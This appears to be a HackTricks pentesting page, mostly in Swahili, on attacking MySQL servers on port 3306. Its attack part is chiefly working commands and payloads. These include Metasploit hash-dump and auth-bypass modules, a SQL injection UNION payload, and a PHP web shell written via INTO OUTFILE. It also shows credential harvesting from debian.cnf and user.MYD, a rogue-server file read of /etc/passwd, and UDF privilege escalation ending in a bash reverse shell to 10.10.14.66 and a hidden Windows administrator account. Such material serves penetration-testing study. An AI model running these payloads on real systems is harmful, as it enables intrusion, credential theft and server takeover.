3306 - Pentesting Mysql

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa malengo ya kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila nidhamu.

Taarifa Msingi

MySQL inaweza kuelezwa kama Mfumo wa Usimamizi wa Takwimu wa Uhusiano (RDBMS) wa chanzo wazi ambao upatikana bila malipo. Inafanya kazi kwenye Lugha ya Utafutaji Iliyopangwa (SQL), ikiruhusu usimamizi na upangaji wa maktaba za takwimu.

Bandari ya chaguo: 3306

3306/tcp open  mysql

Kuunganisha

Mitaani

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Kijijini

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Uchambuzi wa Kina

Baadhi ya hatua za uchambuzi zinahitaji sifa halali

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Andika data yoyote ya binary

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Amri za MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Uchambuzi wa Ruhusa za MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Unaweza kuona katika nyaraka maana ya kila ruhusa: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

pageMySQL File priv to SSRF/RCE

MySQL kusoma faili yoyote kwa njia ya mteja

Kwa kweli, unapojaribu kupakia data za ndani kwenye meza maudhui ya faili kwenye seva ya MySQL au MariaDB inamuuliza mteja asome na kutuma maudhui. Kisha, ikiwa unaweza kuhariri mteja wa mysql kuunganisha kwenye seva yako ya MySQL, unaweza kusoma faili yoyote. Tafadhali kumbuka kuwa hii ndio tabia inayotumika:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Kumbuka neno "local") Kwa sababu bila "local" unaweza kupata:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Uchunguzi wa Awali: https://github.com/allyshka/Rogue-MySql-Server Katika makala hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kuongeza hadi RCE: https://paper.seebug.org/1113/ Hapa unaweza kupata muhtasari wa shambulio: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​​RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa ** lengo la kukuza maarifa ya kiufundi**, kongamano hili ni mahali pa mkutano wa joto kwa wataalamu wa teknolojia na usalama wa mtandao katika kila nidhamu.

POST

Mtumiaji wa Mysql

Itakuwa ya kuvutia sana ikiwa mysql inaendeshwa kama root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Mipangilio Hatari ya mysqld.cnf

Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumiwa kufafanua uendeshaji wake na hatua za usalama:

  • Mipangilio ya user hutumiwa kuteua mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.

  • password hutumika kuweka nenosiri linalohusishwa na mtumiaji wa MySQL.

  • admin_address inabainisha anwani ya IP inayosikiliza kwa ajili ya mawasiliano ya TCP/IP kwenye interface ya mtandao wa utawala.

  • Kipengele cha debug kinaonyesha mipangilio ya sasa ya upelelezi, ikiwa ni pamoja na taarifa nyeti ndani ya magogo.

  • sql_warnings inasimamia ikiwa vifungu vya taarifa vinazalishwa kwa taarifa za kuingiza safu moja wakati onyo linatokea, likiwa na data nyeti ndani ya magogo.

  • Kwa secure_file_priv, wigo wa uingizaji na kuuza data unazuiliwa ili kuboresha usalama.

Kupandisha Hadhi ya Mamlaka

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Kupanda Mamlaka kupitia maktaba

Ikiwa seva ya mysql inaendeshwa kama root (au mtumiaji mwingine aliye na mamlaka zaidi) unaweza kufanya iendekeze amri. Kwa hili, unahitaji kutumia kazi zilizoundwa na mtumiaji. Na ili kuunda kazi iliyoundwa na mtumiaji utahitaji maktaba kwa OS inayoendesha mysql.

Maktaba mbaya ya kutumia inaweza kupatikana ndani ya sqlmap na ndani ya metasploit kwa kufanya locate "*lib_mysqludf_sys*". Faili za .so ni maktaba za linux na .dll ni zile za Windows, chagua ile unayohitaji.

Ikiwa huna maktaba hizo, unaweza kuzitafuta, au pakua hii msimbo wa C wa linux na kuutengeneza ndani ya mashine ya linux yenye kasoro.

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Sasa kwamba una maktaba, ingia ndani ya Mysql kama mtumiaji aliye na mamlaka (root?) na fuata hatua zifuatazo:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Kupata siri za MySQL kutoka kwenye faili

Ndani ya /etc/mysql/debian.cnf unaweza kupata nywila ya maandishi ya wazi ya mtumiaji debian-sys-maint

cat /etc/mysql/debian.cnf

Unaweza kutumia sifa hizi kuingia kwenye database ya mysql.

Ndani ya faili: /var/lib/mysql/mysql/user.MYD unaweza kupata mishale yote ya watumiaji wa MySQL (zile unazoweza kuchimba kutoka mysql.user ndani ya database).

Unaweza kuzichimba kwa kufanya:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Kuwezesha kuingiza kumbukumbu

Unaweza kuwezesha kuingiza kumbukumbu za maswali ya mysql ndani ya /etc/mysql/my.cnf kwa kutoa maoni kwenye mistari ifuatayo:

Faili za Kufaa

Faili za Mipangilio

  • windows *

  • config.ini

  • my.ini

  • windows\my.ini

  • winnt\my.ini

  • <InstDir>/mysql/data/

  • unix

  • my.cnf

  • /etc/my.cnf

  • /etc/mysql/my.cnf

  • /var/lib/mysql/my.cnf

  • ~/.my.cnf

  • /etc/my.cnf

  • Historia ya Amri

  • ~/.mysql.history

  • Faili za Kuingiza

  • connections.log

  • update.log

  • common.log

Msingi wa Takwimu/Meza za Msingi za MySQL

ALL_PLUGINS APPLICABLE_ROLES CHARACTER_SETS CHECK_CONSTRAINTS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENABLED_ROLES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE KEY_CACHES OPTIMIZER_TRACE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS SYSTEM_VARIABLES TABLES TABLESPACES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS INNODB_LOCKS INNODB_TRX INNODB_SYS_DATAFILES INNODB_FT_CONFIG INNODB_SYS_VIRTUAL INNODB_CMP INNODB_FT_BEING_DELETED INNODB_CMP_RESET INNODB_CMP_PER_INDEX INNODB_CMPMEM_RESET INNODB_FT_DELETED INNODB_BUFFER_PAGE_LRU INNODB_LOCK_WAITS INNODB_TEMP_TABLE_INFO INNODB_SYS_INDEXES INNODB_SYS_TABLES INNODB_SYS_FIELDS INNODB_CMP_PER_INDEX_RESET INNODB_BUFFER_PAGE INNODB_FT_DEFAULT_STOPWORD INNODB_FT_INDEX_TABLE INNODB_FT_INDEX_CACHE INNODB_SYS_TABLESPACES INNODB_METRICS INNODB_SYS_FOREIGN_COLS INNODB_CMPMEM INNODB_BUFFER_POOL_STATS INNODB_SYS_COLUMNS INNODB_SYS_FOREIGN INNODB_SYS_TABLESTATS GEOMETRY_COLUMNS SPATIAL_REF_SYS CLIENT_STATISTICS INDEX_STATISTICS USER_STATISTICS INNODB_MUTEXES TABLE_STATISTICS INNODB_TABLESPACES_ENCRYPTION user_variables INNODB_TABLESPACES_SCRUBBING INNODB_SYS_SEMAPHORE_WAITS

Last updated